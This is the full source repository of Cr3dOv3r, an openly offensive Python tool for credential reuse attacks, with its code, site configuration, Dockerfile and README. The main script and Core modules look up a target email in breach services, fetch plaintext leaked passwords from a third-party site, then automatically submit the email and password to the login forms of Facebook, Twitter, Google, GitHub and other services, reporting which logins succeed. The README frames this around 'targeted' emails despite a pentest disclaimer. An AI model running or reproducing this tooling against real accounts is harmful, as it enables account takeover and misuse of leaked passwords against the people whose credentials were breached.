├── .gitattributes ├── .github └── FUNDING.yml ├── .gitignore ├── Core ├── __init__.py ├── color.py ├── ispwned.py ├── updater.py ├── utils.py └── websites.py ├── Cr3d0v3r.py ├── Data ├── Email1.png ├── Email2.png ├── Email3.png ├── banners.txt └── version.txt ├── Dockerfile ├── LICENSE ├── README.md ├── requirements.txt └── win_requirements.txt /.gitattributes: -------------------------------------------------------------------------------- 1 | # Auto detect text files and perform LF normalization 2 | * text=auto -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | github: D4Vinci 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *.cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # Jupyter Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # SageMath parsed files 79 | *.sage.py 80 | 81 | # Environments 82 | .env 83 | .venv 84 | env/ 85 | venv/ 86 | ENV/ 87 | 88 | # Spyder project settings 89 | .spyderproject 90 | .spyproject 91 | 92 | # Rope project settings 93 | .ropeproject 94 | 95 | # mkdocs documentation 96 | /site 97 | 98 | # mypy 99 | .mypy_cache/ 100 | -------------------------------------------------------------------------------- /Core/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Core/__init__.py -------------------------------------------------------------------------------- /Core/color.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | # Written by: Karim shoair - D4Vinci 3 | # Copied from Cr3dOv3r Framework ( Wait for it :D ) 4 | import os,sys 5 | global G, Y, B, R, W , M , C , end ,Bold,underline 6 | def set_colors(): 7 | global G, Y, B, R, W , M , C , end ,Bold,underline 8 | if os.name=="nt": 9 | try: 10 | import win_unicode_console , colorama 11 | win_unicode_console.enable() 12 | colorama.init() 13 | #green - yellow - blue - red - white - magenta - cyan - reset 14 | G,Y,B,R,W,M,C,end= '\033[92m','\033[93m','\033[94m','\033[91m','\x1b[37m','\x1b[35m','\x1b[36m','\033[0m' 15 | Bold = "\033[1m" 16 | underline = "\033[4m" 17 | except: 18 | G = Y = B = R = W = G = Y = B = R = Bold = underline = '' 19 | else: 20 | #import colorama 21 | #colorama.init() 22 | #green - yellow - blue - red - white - magenta - cyan - reset 23 | G,Y,B,R,W,M,C,end= '\033[92m','\033[93m','\033[94m','\033[91m','\x1b[37m','\x1b[35m','\x1b[36m','\033[0m' 24 | Bold = "\033[1m" 25 | underline = "\033[4m" 26 | 27 | set_colors() 28 | 29 | def status(text): 30 | print( C+"[+] "+G+text+end ) 31 | 32 | def error(text): 33 | print( M+"[!] "+R+text+end ) 34 | -------------------------------------------------------------------------------- /Core/ispwned.py: -------------------------------------------------------------------------------- 1 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 2 | # -*- encoding: utf-8 -*- 3 | import requests,sys 4 | from .color import * 5 | from imp import reload 6 | if sys.version[0] == '2': 7 | reload(sys) 8 | sys.setdefaultencoding("utf-8") 9 | 10 | UserAgent = {'User-Agent': 'Cr3dOv3r-Framework'} 11 | def check_haveibeenpwned(email): 12 | #from haveibeenpwnd API docs from https://haveibeenpwned.com/API/v2#BreachesForAccount 13 | url = "https://haveibeenpwned.com/api/v2/breachedaccount/"+str(email) 14 | req = requests.get(url, headers=UserAgent) 15 | if req.status_code==200: 16 | return req.json() 17 | else: 18 | return False 19 | 20 | def grab_password(email): 21 | # No docs(Because no API), just found it by analyzing the network and told the admin :D 22 | url = "https://ghostproject.fr/search.php" 23 | data = {"param":email} 24 | req = requests.post(url,headers=UserAgent,data=data) 25 | result = req.text.split("\\n") 26 | if "Error" in req.text or len(result)==2: 27 | return False 28 | else: 29 | return result[1:-1] 30 | 31 | def parse_data(email,np): 32 | data = check_haveibeenpwned(email) 33 | if not data: 34 | error("No leaks found in Haveibeenpwned website!") 35 | else: 36 | status("Haveibeenpwned website results: "+Y+str(len(data))) 37 | form = "Name : {web} | Date : {date} | What leaked : {details}" 38 | for website in data: 39 | line = form.format(web=M+website["Name"]+B,date=M+website["AddedDate"]+B,details=M+",".join(website["DataClasses"])+B) 40 | status(B+line) 41 | if not np: 42 | p = grab_password(email) 43 | if p: 44 | status("Plaintext password(s) found!") 45 | for pp in p: 46 | print(C+" │"+B+" └──── "+W+pp.split(":")[1]) 47 | else: 48 | error("Didn't find any plaintext password published!") 49 | -------------------------------------------------------------------------------- /Core/updater.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | import os,sys 4 | from .color import * 5 | if sys.version_info[0]==3: 6 | from urllib.request import urlopen 7 | elif sys.version_info[0]==2: 8 | from urllib import urlopen 9 | 10 | def check(): 11 | f = open( os.path.join("Data","version.txt"), 'r') 12 | file_data = f.read().strip() 13 | try: 14 | version = urlopen('https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/master/Data/version.txt').read().decode('utf-8').strip() 15 | except: 16 | error("Can't reach Internet !!!") 17 | sys.exit(0) 18 | 19 | if version=="1.0": 20 | return R+Bold+"This is very old version stop using it ! Cr3dOv3r became framework now, pull it! :D" 21 | elif version != file_data: 22 | return file_data+R+" but new version is available!" 23 | else: 24 | return file_data 25 | -------------------------------------------------------------------------------- /Core/utils.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | import sys,os 4 | from . import updater 5 | from .websites import * 6 | from .color import * 7 | 8 | def getinput(text): 9 | # Return the suitable input type according to python version 10 | ver = sys.version[0] 11 | if ver=="3": 12 | return input(text) 13 | else: 14 | return raw_input(text) 15 | 16 | def banner(): 17 | if os.name=="nt": 18 | os.system("cls") 19 | else: 20 | os.system("clear") 21 | version = updater.check() 22 | banner = open(os.path.join("Data","banners.txt"), encoding="utf8").read() 23 | banner_to_print = G + banner.format(Name=R+"Cr3d0v3r By "+Bold+B+"D4Vinci -"+M+" V"+version+end+G, 24 | Description=C+"Know the dangers of email credentials reuse attacks."+G, 25 | Loaded=B+"Loaded "+Y+str(len(all_websites))+B+" website."+G) + end 26 | print(banner_to_print) 27 | 28 | all_websites =list(websites.keys()) + list(custom_websites.keys()) + list(req_websites.keys()) 29 | -------------------------------------------------------------------------------- /Core/websites.py: -------------------------------------------------------------------------------- 1 | # -*- encoding: utf-8 -*- 2 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 3 | #Instead of creating many config/text files and parse them I think this better because I'm lazy and it's easier to add new website :D . 4 | #See how to add a website in the repo wiki 5 | 6 | #Normal websites (That use one form) 7 | #Facbook data 8 | facebook = { "url":"https://en-gb.facebook.com/login.php" , 9 | "form":"#login_form", 10 | "e_form":"email" , 11 | "p_form":"pass" } 12 | 13 | #Twitter data 14 | twitter = { "url":"https://mobile.twitter.com/sessions" , 15 | "form":'form[action="/sessions"]', 16 | "e_form":"session[username_or_email]", 17 | "p_form":"session[password]"} 18 | 19 | #Ask.fm data 20 | ask = { "url":"https://ask.fm/login" , 21 | "form":'form[action="/login"]', 22 | "e_form":"login" , 23 | "p_form":"password" } 24 | 25 | #linkedin 26 | #the reason for LinkedIn false positives :3 it's because of captcha appears from the second attempt! 27 | # let's solve that 28 | linkedin = { "url":"https://www.linkedin.com/uas/login" , 29 | "form":'#login', 30 | "e_form":"session_key" , 31 | "p_form":"session_password" } 32 | 33 | #Github 34 | github = { "url":"https://github.com/login" , 35 | "form":'form[action="/session"]', 36 | "e_form":"login" , 37 | "p_form":"password" } 38 | 39 | '''#Needs to enable JS ? Okay I do that later with dryscrape maybe 40 | #Protonmail 41 | protonmail = { "url":"https://mail.protonmail.com/login" , 42 | "form":'form[action="login"]', 43 | "e_form":"username" , 44 | "p_form":"password" } 45 | ''' 46 | 47 | #VirusTotal 48 | virustotal = { "url":"https://www.virustotal.com/en/account/signin/", 49 | "form":'form[id="frm-signin"]', 50 | "e_form":"username" , 51 | "p_form":"password" } 52 | 53 | #Ebay 54 | ebay = { "url":"https://signin.ebay.com/ws/eBayISAPI.dll" , 55 | "form":'#SignInForm', 56 | "e_form":"userid" , 57 | "p_form":"pass" } 58 | 59 | #Wikipedia 60 | wikipedia = { "url":"https://en.wikipedia.org/w/index.php?title=Special:UserLogin" , 61 | "form":'form[action="/wiki/Special:UserLogin"]', 62 | "e_form":"wpName" , 63 | "p_form":"wpPassword" } 64 | 65 | #StackOverFlow 66 | stackoverflow = { "url":"https://stackoverflow.com/users/login" , 67 | "form":'form[id="login-form"]', 68 | "e_form":"email" , 69 | "p_form":"password" } 70 | 71 | #FourSquare 72 | foursquare = { "url":"https://foursquare.com/login" , 73 | "form":'form[id="loginToFoursquare"]', 74 | "e_form":"emailOrPhone" , 75 | "p_form":"password" } 76 | 77 | #Gitlab 78 | gitlab = { "url":"https://gitlab.com/users/sign_in" , 79 | "form":'form[action="/users/sign_in"]', 80 | "e_form":"user[login]" , 81 | "p_form":"user[password]" } 82 | 83 | #Airdroid 84 | air = { "url":"https://www.airdroid.com/en/signin/", 85 | "form":'form[id="form_sign"]', 86 | "e_form":"email" , 87 | "p_form":"password" } 88 | 89 | #--------------------------------------------------- 90 | #Websites that uses two forms 91 | #Gmail 92 | google = { "url":"https://accounts.google.com/signin" , 93 | "form1":'form[id="gaia_loginform"]', 94 | "form2":'form[id="gaia_loginform"]', 95 | "e_form":"Email", 96 | "p_form":"Passwd"} 97 | 98 | #Yahoo 99 | yahoo = { "url":"https://login.yahoo.com" , 100 | "form1":'form[id="login-username-form"]', 101 | "form2":'form[class="pure-form pure-form-stacked"]', 102 | "e_form":"username", 103 | "p_form":"password"} 104 | 105 | #-------------------------------------- 106 | #Websites login with post requests 107 | #MediaFire 108 | mediafire = { "url":"https://www.mediafire.com/dynamic/client_login/mediafire.php" , 109 | "e_form":"login_email" , 110 | "p_form":"login_pass", 111 | "verify":["login"]#After submitting if this words exist in the response page then login not successful 112 | } 113 | 114 | ############################## 115 | #### Organizing websites ##### 116 | ############################## 117 | websites = {" Facebook":facebook, 118 | " Twitter ":twitter, 119 | " Ask.fm ":ask, 120 | " Github ":github, 121 | "Virustotal":virustotal, 122 | "LinkedIn ":linkedin, 123 | " Ebay.com":ebay, 124 | "Wikipedia":wikipedia, 125 | " Airdroid":air, 126 | " StackOF ":stackoverflow, 127 | "FourSquare":foursquare, 128 | " Gitlab ":gitlab 129 | } 130 | 131 | custom_websites = {" Google ":google, 132 | " Yahoo ":yahoo 133 | } 134 | 135 | req_websites = { "Mediafire":mediafire 136 | } 137 | -------------------------------------------------------------------------------- /Cr3d0v3r.py: -------------------------------------------------------------------------------- 1 | #Written by: Karim shoair - D4Vinci ( Cr3dOv3r ) 2 | # -*- coding: utf-8 -*- 3 | import os,argparse,requests,signal 4 | from getpass import getpass 5 | import mechanicalsoup as ms 6 | from Core import ispwned 7 | from Core.utils import * 8 | from Core.color import * 9 | 10 | def signal_handler(signal, frame): 11 | print(end+'\n') 12 | sys.exit(0) 13 | signal.signal(signal.SIGINT, signal_handler) 14 | 15 | parser = argparse.ArgumentParser(prog='Cr3d0v3r.py') 16 | parser.add_argument("email", help="Email/username to check") 17 | parser.add_argument("-p",action="store_true", help="Don't check for leaks or plain text passwords.") 18 | parser.add_argument("-np",action="store_true", help="Don't check for plain text passwords.") 19 | parser.add_argument("-q",action="store_true", help="Quiet mode (no banner).") 20 | args = parser.parse_args() 21 | email = args.email 22 | 23 | def is_there_captcha(page_source): 24 | # Got these words from the recaptcha api docs Muhahahaha 25 | if any( w in page_source.lower() for w in ["recaptcha/api","grecaptcha"]): 26 | return True 27 | return False 28 | 29 | #with mechanicalsoup 30 | def login( name ,dic ,email ,pwd ): 31 | url ,form,e_form ,p_form = dic["url"] ,dic["form"],dic["e_form"] ,dic["p_form"] 32 | browser = ms.StatefulBrowser() 33 | try: 34 | browser.open(url) 35 | except: 36 | error("[{:10s}] Couldn't even open the page! Do you have internet !?".format(name)) 37 | return 38 | 39 | if is_there_captcha(browser.get_current_page().text): 40 | error("[{:10s}] Found captcha on page loading!".format(name)) 41 | return 42 | 43 | try: 44 | browser.select_form(form) 45 | browser[e_form] = email 46 | browser[p_form] = pwd 47 | browser.submit_selected() 48 | except ms.utils.LinkNotFoundError: 49 | error("[{:10s}] Something wrong with the website maybe it's blocked!".format(name)) 50 | return 51 | 52 | if is_there_captcha(browser.get_current_page().text): 53 | error("[{:10s}] Found captcha after submitting login page!".format(name)) 54 | return 55 | #Now let's check if it was success by trying to use the same form again and if I could use it then the login not success 56 | try: 57 | browser.select_form(form) 58 | browser.close() 59 | error("[{:10s}] Login unsuccessful!".format(name)) 60 | except ms.utils.LinkNotFoundError: 61 | browser.close() 62 | status("[{:10s}] Login successful!".format(name)) 63 | 64 | #websites that use two forms to login 65 | def custom_login( name ,dic ,email ,pwd ): 66 | url ,form1,form2,e_form ,p_form = dic["url"] ,dic["form1"],dic["form2"],dic["e_form"] ,dic["p_form"] 67 | browser = ms.StatefulBrowser() 68 | try: 69 | browser.open(url) 70 | except: 71 | error("[{:10s}] Couldn't even open the page! Do you have internet !?".format(name)) 72 | return 73 | 74 | if is_there_captcha(browser.get_current_page().text): 75 | error("[{:10s}] Found captcha on page loading!".format(name)) 76 | return 77 | 78 | try: 79 | browser.select_form(form1) 80 | browser[e_form] = email 81 | except ms.utils.LinkNotFoundError: 82 | error("[{:10s}] Something wrong in parsing, maybe it displayed captcha!".format(name)) 83 | return 84 | 85 | try: 86 | browser.submit_selected() 87 | browser.select_form(form2) 88 | browser[p_form] = pwd 89 | browser.submit_selected() 90 | except ms.utils.LinkNotFoundError: 91 | browser.close() 92 | error("[{:10s}] Email not registered!".format(name)) 93 | return 94 | 95 | if is_there_captcha(browser.get_current_page().text): 96 | error("[{:10s}] Found captcha after submitting login page!".format(name)) 97 | return 98 | #Now let's check if it was success by trying to use the same form again and if I could use it then the login not success 99 | try: 100 | browser.select_form(form2) 101 | browser.close() 102 | error("[{:10s}] Login unsuccessful!".format(name)) 103 | except: 104 | browser.close() 105 | status("[{:10s}] Login successful!".format(name)) 106 | #That's a lot of exceptions :"D 107 | 108 | #Login to websites with post requests 109 | def req_login( name ,dic ,email ,pwd ): 110 | url ,verify,e_form ,p_form = dic["url"] ,dic["verify"],dic["e_form"] ,dic["p_form"] 111 | data = {e_form:email,p_form:pwd} 112 | req = requests.post(url,data=data).text 113 | if is_there_captcha(req): 114 | error("[{:10s}] Found captcha on page loading!".format(name)) 115 | return 116 | #Now let's check if it was success by trying to find the verify words and if I could find them then login not successful 117 | if any( word in req for word in verify): 118 | error("[{:10s}] Login unsuccessful!".format(name)) 119 | return 120 | status("[{:10s}] Login successful!".format(name)) 121 | 122 | def main(): 123 | if not args.q: 124 | banner() 125 | if not args.p: 126 | status("Checking email in public leaks...") 127 | ispwned.parse_data(email,args.np) 128 | 129 | print(C+" │"+end) 130 | line =C+" └──=>Enter a password"+W+"─=> " 131 | if os.name=="nt": 132 | pwd = getinput(line) #Escaping the echo warning, sorry guyss (¯\_(ツ)_/¯) 133 | else: 134 | pwd = getpass(line) 135 | 136 | print("") 137 | status("Testing email against {} website".format( Y+str(len(all_websites))+G )) 138 | for wd in list(websites.keys()): 139 | dic = websites[wd] 140 | login( wd ,dic ,email ,pwd ) 141 | 142 | for wd in list(custom_websites.keys()): 143 | dic = custom_websites[wd] 144 | custom_login( wd ,dic ,email ,pwd ) 145 | 146 | for wd in list(req_websites.keys()): 147 | dic = req_websites[wd] 148 | req_login( wd ,dic ,email ,pwd ) 149 | 150 | if __name__ == '__main__': 151 | main() 152 | -------------------------------------------------------------------------------- /Data/Email1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Data/Email1.png -------------------------------------------------------------------------------- /Data/Email2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Data/Email2.png -------------------------------------------------------------------------------- /Data/Email3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/D4Vinci/Cr3dOv3r/4e1f7845f341fa09e4b998f9c7064133cfa43d9f/Data/Email3.png -------------------------------------------------------------------------------- /Data/banners.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | ▄████▄ ██▀███ ▓█████ ▓█████▄ ▒█████ ██▒ █▓▓█████ ██▀███ 4 | ▒██▀ ▀█ ▓██ ▒ ██▒▓█ ▀ ▒██▀ ██▌▒██▒ ██▒▓██░ █▒▓█ ▀ ▓██ ▒ ██▒ 5 | ▒▓█ ▄ ▓██ ░▄█ ▒▒███ ░██ █▌▒██░ ██▒ ▓██ █▒░▒███ ▓██ ░▄█ ▒ {Name} 6 | ▒▓▓▄ ▄██▒▒██▀▀█▄ ▒▓█ ▄ ░▓█▄ ▌▒██ ██░ ▒██ █░░▒▓█ ▄ ▒██▀▀█▄ {Description} 7 | ▒ ▓███▀ ░░██▓ ▒██▒░▒████▒░▒████▓ ░ ████▓▒░ ▒▀█░ ░▒████▒░██▓ ▒██▒ {Loaded} 8 | ░ ░▒ ▒ ░░ ▒▓ ░▒▓░░░ ▒░ ░ ▒▒▓ ▒ ░ ▒░▒░▒░ ░ ▐░ ░░ ▒░ ░░ ▒▓ ░▒▓░ 9 | ░ ▒ ░▒ ░ ▒░ ░ ░ ░ ░ ▒ ▒ ░ ▒ ▒░ ░ ░░ ░ ░ ░ ░▒ ░ ▒░ 10 | ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ░░ ░ ░░ ░ 11 | ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 12 | ░ ░ ░ 13 | -------------------------------------------------------------------------------- /Data/version.txt: -------------------------------------------------------------------------------- 1 | 0.4.4 2 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3-slim 2 | 3 | RUN apt-get update && apt-get -y install git 4 | RUN git clone https://github.com/D4Vinci/Cr3dOv3r.git 5 | WORKDIR Cr3dOv3r/ 6 | RUN pip install -r requirements.txt 7 | 8 | ENTRYPOINT ["python", "Cr3d0v3r.py"] 9 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Karim shoair 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Cr3dOv3r [![Python 3.5](https://img.shields.io/badge/Python-3.5-yellow.svg)](http://www.python.org/download/) [![Python 2.7](https://img.shields.io/badge/Python-2.7-yellow.svg)](http://www.python.org/download/) ![Build Status](https://img.shields.io/badge/Version-0.4.4-red.svg) 2 | 3 | **Your best friend in credential reuse attacks.** 4 | 5 | You give Cr3dOv3r an email then it does two simple useful jobs with it: 6 | - Search for public leaks for the email and returns the result with the most useful details about the leak (Using haveibeenpwned API) and tries to get the plain text passwords from leaks it find (Using [@GhostProjectME](https://twitter.com/GhostProjectME)). 7 | - Now you give it a password or a leaked password then it tries this credentials against some well-known websites (ex: Facebook, Twitter, Google...), tells if the login successful and if there's captcha some where blocking our way! 8 | 9 | ### Some of the scenarios Cr3dOv3r can be used in it 10 | - Check if the targeted email is in any leaks and then use the leaked password to check it against the websites. 11 | - Check if the target credentials you found is reused on other websites/services. 12 | - Checking if the old password you got from the target/leaks is still used in any website. 13 | 14 | # Screenshots 15 | ![screenshot](https://github.com/D4Vinci/Cr3dOv3r/blob/master/Data/Email1.png) 16 | ![screenshot](https://github.com/D4Vinci/Cr3dOv3r/blob/master/Data/Email2.png) 17 | ![screenshot](https://github.com/D4Vinci/Cr3dOv3r/blob/master/Data/Email3.png) 18 | 19 | # Usage 20 | ``` 21 | usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email 22 | 23 | positional arguments: 24 | email Email/username to check 25 | 26 | optional arguments: 27 | -h, --help show this help message and exit 28 | -p Don't check for leaks or plain text passwords. 29 | -np Don't check for plain text passwords. 30 | -q Quiet mode (no banner). 31 | 32 | ``` 33 | 34 | ## Installing and requirements 35 | ### To make the tool work at its best you must have : 36 | - Python 3.x or 2.x (preferred 3). 37 | - Linux or Windows system. 38 | - Worked on some machines with MacOS and python3. 39 | - The requirements mentioned in the next few lines. 40 | 41 | ### Installing 42 | **+For windows : (After downloading ZIP and upzip it)** 43 | ``` 44 | cd Cr3dOv3r-master 45 | python -m pip install -r win_requirements.txt 46 | python Cr3d0v3r.py -h 47 | ``` 48 | **+For Linux :** 49 | ``` 50 | git clone https://github.com/D4Vinci/Cr3dOv3r.git 51 | cd Cr3dOv3r 52 | python3 -m pip install -r requirements.txt 53 | python3 Cr3d0v3r.py -h 54 | ``` 55 | 56 | **+For docker :** 57 | ```bash 58 | git clone https://github.com/D4Vinci/Cr3dOv3r.git 59 | docker build -t cr3dov3r Cr3dOv3r/ 60 | docker run -it cr3dov3r "test@example.com" 61 | ``` 62 | 63 | 64 | **If you want to add a website to the tool, follow the instructions in the [wiki](https://github.com/D4Vinci/Cr3dOv3r/wiki)** 65 | 66 | ## Contact 67 | - [Twitter](https://twitter.com/D4Vinci1) 68 | 69 | ## Donation 70 | If this tool has been useful for you, feel free to thank me by buying me a coffee :) 71 | 72 | [![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoffee.com/d4vinci) 73 | 74 | ## Disclaimer 75 | Cr3dOv3r is created to show how could credential reuse attacks get dangerous and it's not responsible for misuse or illegal purposes. Use it only for Pen-test or educational purpose !!! 76 | 77 | Copying a code from this tool or using it in another tool is accepted as you mention where you get it from :smile: 78 | 79 | > Pull requests are always welcomed :D 80 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | mechanicalsoup >=0.9 2 | requests>=2.18.4 3 | pyOpenSSL>=16.2.0 4 | -------------------------------------------------------------------------------- /win_requirements.txt: -------------------------------------------------------------------------------- 1 | mechanicalsoup >=0.9 2 | requests>=2.18.4 3 | win_unicode_console 4 | colorama>=0.3.7 5 | pyOpenSSL>=16.2.0 6 | --------------------------------------------------------------------------------